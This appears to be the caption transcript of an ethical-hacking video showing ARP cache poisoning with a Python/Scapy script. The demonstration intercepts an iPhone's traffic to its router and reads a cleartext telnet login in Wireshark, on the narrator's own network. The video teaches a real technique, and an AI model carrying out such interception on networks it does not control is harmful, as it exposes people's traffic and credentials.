iPhone and Android WiFi Man-in-the-middle attack // PYTHON Scapy scripts for attacking networks

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

now before we get started this video is not sponsored by a vpn provider in this video i'm going to show you how to use a python script to intercept traffic sent from a phone to its default gateway on a wi-fi network in other words if you went to a coffee shop and you're using their wi-fi network as an example all your traffic sent to the internet would be captured by my kali virtual machine or kali pc depending on if you're using bare metal or not with a python script now there are applications out there that do this but i want to show you that if you understand python if you understand how to write scripts using python and scapy you can do a whole bunch of things in this series of videos i've shown you how to attack many protocols i've shown you how to attack eigrp bgp spanning tree a whole bunch of protocols and this is just another example of that where i'm attacking op op is used on ethernet networks op is used on wi-fi networks this allows you to run a man in the middle attack where you can see all traffic sent from one device to another on the local segment or the wi-fi network now this script has taken a lot of time and a lot of effort to put together if you enjoy these types of ethical hacking videos if you enjoy this type of ethical hacking content please consider subscribing to my youtube channel please like this video and click on the bell to get notifications so that you know when i upload a new video that really does help me with the youtube robots okay without further ado let me show you how you can intercept traffic using the script [Music] in this example i'm running cali within a virtual machine on a windows computer this windows laptop is connected to the wi-fi network this iphone is connected to the same wi-fi network by default when sending traffic to the internet as an example or to another device on the network the phone is going to send the traffic to either the device directly in the network or to its default gateway so in this example if i have a look at my wi-fi settings you can see that i'm using a private mac address one of the updates that apple made to better secure iphones as an example is to use random or private mac addresses which change all the time you can see the ip address of this device is 192.168.1 132 default gateway or is 192.168.1.249. so if this iphone was sending traffic to a website such as facebook or google or another website it would send it to that ip address and to do that it will send a op request onto the network requesting the mac address of this device and then it will send traffic to that mac address directly so for this laptop to see the traffic sent from the iphone to its default gateway we're going to run up poisoning and poison the op cache of both the phone and its default gateway in other words the router so that traffic is sent via the laptop to the default gateway so rather than traffic going directly to its default gateway the phone will send traffic to the router via this kali virtual machine now the script that we're using is fairly complicated but we've put a lot of comments in the script to make it easier to understand so hopefully by reading the comments in the script it will make a lot of sense to you most of the script is simply comments explaining what each line of code does one of the things we need to do as an example is set up linux to forward traffic so when traffic hits the linux virtual machine or computer if you're using a physical device we need to forward that on to the default gateway so traffic needs to be bridged or forwarded through this virtual machine and hence we've got the command ipv4 ip4 equal to one we want to forward traffic through the virtual machine there's a whole bunch of other code here it's a fairly complicated script but hopefully the comments in the script will make it a lot easier to understand now there are examples online showing you how to run a man-in-the-middle attack using python and scapy but a lot of them don't seem to work properly with devices such as iphones so this works with an iphone and various other devices we were able to intercept all traffic for all devices that we tested let me know if it works for you now as always a warning what i'm sharing here is for educational purposes only please do not use the script in starbucks or some other wi-fi network and get into trouble you should only use scripts such as these or other ethical hacking tools ethically so only test this on wi-fi networks that you own only test this on wi-fi networks that you have permission to attack in this example i'm using my own wi-fi network so all the devices that i'm using here are devices that i own my iphone my laptop my wifi network i need to say this unfortunately just to be on the safe side so disclaimer this is for educational purposes only do not go out there and get into trouble don't do something that you shouldn't do make sure that you only test this on networks that you own or have permission to attack okay so once again i've put a lot of comments in the code here i'm not going to explain every single line of code because that'll take a long time so what i'll do is copy the script in cali this is running within a virtual machine i'll go to manage virtual machine settings and what you'll see is i've bridged the network adapter to the wi-fi network within this laptop this laptop is only connected to the wi-fi network it's connected to no other networks okay so in cali i'll open up a terminal and i'll create a script called rpac 1 dot py and i'll paste that script in control x and i'll save that script now notice the format of the command that you need to use if you don't do that you'll be prompted to use the right command so as an example if i just type python3 op1 hack dot py the script's going to tell us that we need to use sudo when running this command so we've tried to add a lot of help information to make it easier to run the script and notice we told there that we need a valid ip range so the correct format for my local network is going to be this command sudo python3 the script name whatever you decide to call that dash ip range and the range that you're going to use so i'll paste that in this is my local subnet you can see that once again on the iphone 192.1681.132 is the ip address you can see the subnet mask two five five two five two four five zero so slash 24 mask uh rod is 192.1681.249 so i'll press enter scrolling up there's the command that we used we can see that the subnet that's going to be checked is 192.168.10 24 that's a valid range linux forwarding of traffic has been enabled we've got a little banner here and then it shows us various mac addresses and ip addresses that have been discovered in the network okay so the ip address of this device is 192.168.1 132. that's this device and the mac address has been correctly discovered mac address here is be 8755 ce46df so that's the private mac address that's been discovered so i'm going to use the command 25 because that's the device that i want to intercept so traffic for 25 and we're told that information has been written to pcap file what i'll do now is run wireshark and see what traffic we capture so i'll get wireshark to run you can see a whole bunch of traffic is being intercepted but for this test i'll use telnet now one of the problems with man in the middle attacks is a lot of traffic today is actually encrypted but just to prove the point i'm going to use telnet which is clear text and i'm going to connect to the router as you can see now traffic is already being captured and if we look at the wireshark capture we can see the actual telnet information so hopefully what we'll see is a prompt and there you go username verification that's what we see on the phone and we're asked to enter our username i'll enter the username here which is peter and i'll enter a password of cisco this is a cisco router obviously you don't want to use a password like that show version that will show us the version of operating system that this router is using that has all been captured by wireshark running within kali within a virtual machine on this windows laptop traffic is being sent via that laptop now can we see the username we can see here that we are prompted for username and we can see p e t e r as a username and then we can see the password prompt and then we can see the password of cisco displayed there now that's not so easy to read so i'll right click and then say follow tcp stream and what we can see now is the whole tcp stream now what you'll notice is the username is repeated and that's because we are capturing traffic from the phone to the router and then from the router back to the phone so we see both the packet that was sent p and the echo so what you may notice is there's different colors here we've got blue and red so p being sent to the router and then red is the echo back so we got the username peter password wasn't echoed back by the router so we see the password just once cisco and then we see the output of the router now this is my real home router so i won't type every command that's possible and show you the passwords etc of my real accounts this is just a quick fake account but show ip interface brief shows me the interfaces on this router and once again if i type follow tcp stream i should see all the information about the version of operating system that the router is using plus here we go show ip interface brief and the interfaces on the router i have successfully been able to capture traffic from this phone to the router on the local segment so this is an arp attack traffic from the phone to the router is going through the kali virtual machine and let's just prove that i'll connect to the router directly and i'll log in with my proper username david show up will show us the arp cache on the router and if we look for 192.168.1.132 which is the phone what you'll notice is the mac address of the phone is different to the mac address that the router is seeing so the art cache of the route is saying that this ip address uses this mac address but that's actually not the mac address of the phone so to prove this let's stop our script so i'll press ctrl c to break the script and then on the router show up and i'll just include 132 that mac address should change to this mac address so what i'll do is open up a browser and go to a website such as kali.org now it may take a while for the op cache to time out notice it's still using the old mac address if i type clear op and let's just press enter there show up pipe include 132 notice the mac address is updated now it's showing the correct mac address of be ending in df app caches can take a while to be flushed and to be updated but in that example notice the mac address has successfully updated but let's run the script again and we want to do 132 so in this case it's 24 on the router notice mac address has changed so the router is no longer sending traffic to the mac address of the phone it's sending it to the mac address of the kali virtual machine okay so there you go i've now shown you how to poison the arp caches of devices in your network to run a man-in-the-middle attack so that a kali virtual machine can capture all the traffic sent from a phone to its default gateway now this will apply to traffic sent to the internet the problem that you're going to encounter is that a lot of traffic sent from a device to the internet is encrypted we typically use https or ssl these days or other encrypted protocols so even if you capture the traffic using a man-in-the-middle attack doesn't mean that you're going to be able to read all the traffic sent to the internet because the traffic is encrypted and this is why you have to be careful with some of the advertising of vpns that you see on on the internet some people say you should use a vpn because you need to be protected when you're in a cafe and you're using the wifi hotspot there's some truth in that because i am capturing the traffic but the traffic is encrypted so vpn doesn't always help you because generally traffic today is encrypted very few websites today are using http most are using https you don't want to connect to websites that are using http or use protocols such as telnet which are clear text you want to use ssh or https or encrypted protocols now vpn can give you an added level of protection if you like because you're now sending ssl down a vpn connection it's all about trust do you trust the wi-fi network do you trust that there won't be people like me hanging around trying to intercept your traffic or do you trust the vpn provider i think for a lot of us we would prefer to trust a vpn provider some of the big ones and send our traffic to a vpn provider rather than just using the wi-fi network with no added protection but be aware that traffic is encrypted so these men in the middle attacks aren't as potent or as powerful as they used to be [Music]

Info

Channel: David Bombal

Views: 171,379

Rating: undefined out of 5

Keywords: python, scapy, arp, arp mitm, arp mitm attack, iphone, apple, android, samsung, android phone, ios, apple ios, apple iphone, kali linux, ceh, oscp, wifi hacking, ethical hacking, scapy python, scapy python3, public wifi, python scapy, kali linux python, scapy sniffing, arp spoofing, arp poisoning, man in the middle, scapy python pcap, wireshark, scapy in python, scapy python script, scapy python sniff, man in the middle attack, arp spoofing attack, arp spoofing linux, cisco, ccna

Id: O1jpck31Ask

Channel Id: undefined

Length: 15min 23sec (923 seconds)

Published: Fri Nov 12 2021